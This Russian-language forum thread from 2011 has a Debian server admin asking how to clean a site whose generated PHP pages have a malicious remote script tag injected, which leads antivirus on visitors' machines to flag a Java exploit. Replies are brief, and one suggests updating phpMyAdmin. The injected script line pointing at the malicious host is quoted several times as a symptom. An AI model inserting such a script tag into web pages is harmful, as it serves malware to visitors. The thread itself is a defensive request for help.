The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Как очистить зараженый сайт"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Информационная безопасность (Блокирование спама и вирусов / Linux)
Изначальное сообщение [ Отслеживать ]

"Как очистить зараженый сайт"  +/
Сообщение от AnJuVi email(ok) on 04-Сен-11, 19:59 
Сервер на Debian, подцепил какую-то бяку, она заразила сайт на этом сервере.
Подписывает в php файлы, сгенерированные шаблонизатором, строку
<script type="text/javascript" src="http://statun.cu.cc/counter.php"></script>
В самих шаблонах ее нет, в файлах шаблонизатора тоже.
В результате у пользователей, которые заходят на сайт, если антивирус Authentium,
Eset, F-Prot, Kaspersky или McAfee, находится

Вирус HEUR:Exploit.Script.Generic в объекте [url]http://statscounter.cu.cc/content/pch.php?f=16[/url]
(Exploit.Java.CVE-2010-0840.ch)

Поиск в файлах сайта строки statun.cu.cc результата не дал. В папке с сайтом ничего подозрительного не нашлось. Clamav на сервере ничего не находит.
Где эта гадость может сидеть?

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Как очистить зараженый сайт"  +/
Сообщение от Аноним (??) on 04-Сен-11, 21:16 
>[оверквотинг удален]
> Подписывает в php файлы, сгенерированные шаблонизатором, строку
> <script type="text/javascript" src="http://statun.cu.cc/counter.php"></script>
> В самих шаблонах ее нет, в файлах шаблонизатора тоже.
> В результате у пользователей, которые заходят на сайт, если антивирус Authentium,
> Eset, F-Prot, Kaspersky или McAfee, находится
> Вирус HEUR:Exploit.Script.Generic в объекте [url]http://statscounter.cu.cc/content/pch.php?f=16[/url]
> (Exploit.Java.CVE-2010-0840.ch)
> Поиск в файлах сайта строки statun.cu.cc результата не дал. В папке с
> сайтом ничего подозрительного не нашлось. Clamav на сервере ничего не находит.
> Где эта гадость может сидеть?

http://www.opennet.me/openforum/vsluhforumID1/92218.html
Вы не думаете, что эта проблема может быть "как-то" связана с вашей предыдущей темой?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Как очистить зараженый сайт"  +/
Сообщение от Аноним (??) on 04-Ноя-11, 18:27 
> http://www.opennet.me/openforum/vsluhforumID1/92218.html
> Вы не думаете, что эта проблема может быть "как-то" связана с вашей
> предыдущей темой?

То что там - на обычную работу cron похоже. А вот сайт ему и правда поломали...

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Как очистить зараженый сайт"  +/
Сообщение от Alex (??) on 19-Сен-11, 21:43 
> Где эта гадость может сидеть?

Проблема решается обновлением phpMyAdmin.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру